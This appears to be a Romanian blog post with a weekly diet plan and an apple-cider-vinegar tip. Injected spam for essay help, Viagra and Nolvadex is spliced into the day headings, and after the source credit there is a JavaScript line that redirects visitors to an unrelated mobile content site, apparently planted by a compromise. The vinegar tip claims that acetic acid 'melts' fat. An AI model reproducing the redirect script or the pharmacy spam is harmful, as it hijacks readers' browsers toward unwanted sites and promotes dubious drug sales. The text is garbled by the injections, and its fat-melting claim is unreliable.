Sa ne placa ce vedem in oglinda !!

 

 

A sosit perioada vacantelor de vara .

Daca doriti sa va simtiti bine si sa nu invidiati alte persoane pentru aspectul lor exterior , va invit sa urmati acest exemplu de dieta !!

Ca să ai parte de silueta dorită, ai la dispo¬ziţie o serie de alimente bogate în substanţe nutritive, cu o cantitate medie de calorii, care sunt săţioase şi nu-ţi pun în pericol organismul. Acest „regim“ alimentar se bazează pe consumul de cereale integrale, întrucât acestea oferă cantităţi mari de fibre, vitamine şi de minerale. Pentru obţinerea proteinelor de calitate, este ideal să mănânci lactate semidegresate, ouă şi carne slabă de vită, de peşte şi de pui, fără piele. De asemenea, fructele şi legumele sunt recomandate în stare cât mai naturală, deoarece abundă în antioxidanţi şi alte substanţe fără de care corpul nostru nu ar putea funcţiona în mod corespunzător.
LUNI
Mic dejun > Un bol cu lapte (semidegresat sau degresat) şi cereale integrale.
Gustare > Un măr/o banană.
Prânz > Carne slabă de pui sau peşte (grătar sau fiartă), salată mixtă (roşii, castraveţi, ridichi, ceapă, ardei gras) cu lămâie şi ulei de măsline.
Gustare > Salată de fructe.
Cină > Ciorbă de legume.
MARȚI
Mic dejun:O omletă din două ouă cu brânză semidegresată şi verdeţuri.
Gustare: Un pumn de migdale, stafide şi nuci. O ceaşcă de ceai verde.
Prânz:O porţie de orez cu legume.Salată de roşii cu ulei de măsline, oţet de mere, sare şi piper.
Gustare:4-5 biscuiţi integrali.
Cină:Ciorbă de lobodă.
MIERCURI your essay helper
Mic dejun > Un pahar de lapte semidegresat, 1-2 felii de pâine integrală cu pate vegetal şi brânză degresată.
Gustare > 1 măr.
Prânz > O porţie de pui cu ciuperci.
Gustare > Un iaurt semidegresat,o banană.
Cină > O salată de roşii, castraveţi, ţelină, măsline, brânză şi ou. Ca dressing, foloseşte oţet de mere şi ulei de măsline.

JOI

Mic dejun >Un bol cu lapte (semidegresat sau degresat) cu cereale integrale.
Gustare > Două fructe la alegere.
Prânz > Cartofi la cuptor cu rozmarin. O salată de varză albă cu piper, ulei de măsline şi oţet de mere.
Gustare > Trei biscuiţi cu făină integrală.
Cină > O supă de găluşte.
VINERI
Mic dejun > O cană de lapte cu cacao, un cub de brânză topită, două felii de pâine integrală sau graham toast cu unt şi miere.
Gustare > Un pumn de cireşe.
Prânz > O porţie de paste integrale cu ton şi sos de roşii.
Gustare > Un baton cu susan şi miere.
Cină > Legume (vinete, dovlecei, roşii, ardei graşi etc.) coapte sau preparate la abur.
Buy Viagra Online and Order cheap Viagra Prescription with Guaranteed lowest prices. Cheap Geneirc Viagra 50 Cents. generic brands of viagra online SÂMBATĂ
Mic dejun > 1-2 feliuţe de pâinici expandate din orez integral, un ou fiert, o cană de ceai verde.
Gustare > 2-3 bucăţele de ciocolată neagră.
Prânz > Friptură la grătar (carne de vită, de curcan sau de pui) sau la cuptor.
Gustare > Salată de fructe (preparată din mere, banane mai puţin coapte, kiwi, căpşuni).
Cină > Somon la tavă cu broccoli fiert şi parmezan ras.
DUMINICĂ Best Prices For All Customers! Buy Nolvadex online In Uk. Instant Shipping, Buy Nolvadex On Sale.
Mic dejun > Un bol cu lapte (semidegresat sau degrasat) cu cereale integrale.
Gustare > Brânză semidegresată cu 2-3 felii de roşii.
Prânz > O porţie de orez integral cu peşte la grătar.
Gustare > Un grepfrut.
Cină > O ciorbă de legume.


Super pont: Oţetul de mere taie pofta de mâncare
Înainte de fiecare masă, consumă 1-2 linguriţe cu oţet de mere, după care este indicat să bei un pahar cu apă. Substanţele din compoziţia oţetului accelerează metabolismul, reduc apetitul, previn apariţia balonării şi menţin în limite normale nivelul zahărului din sânge. Unele cercetări arată că acidul acetic, din compoziţia acestui produs, „topeşte“ grăsimea prin activarea celulelor antioxidante.

 

Sursa:   www.clickpentrufemei.ro

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *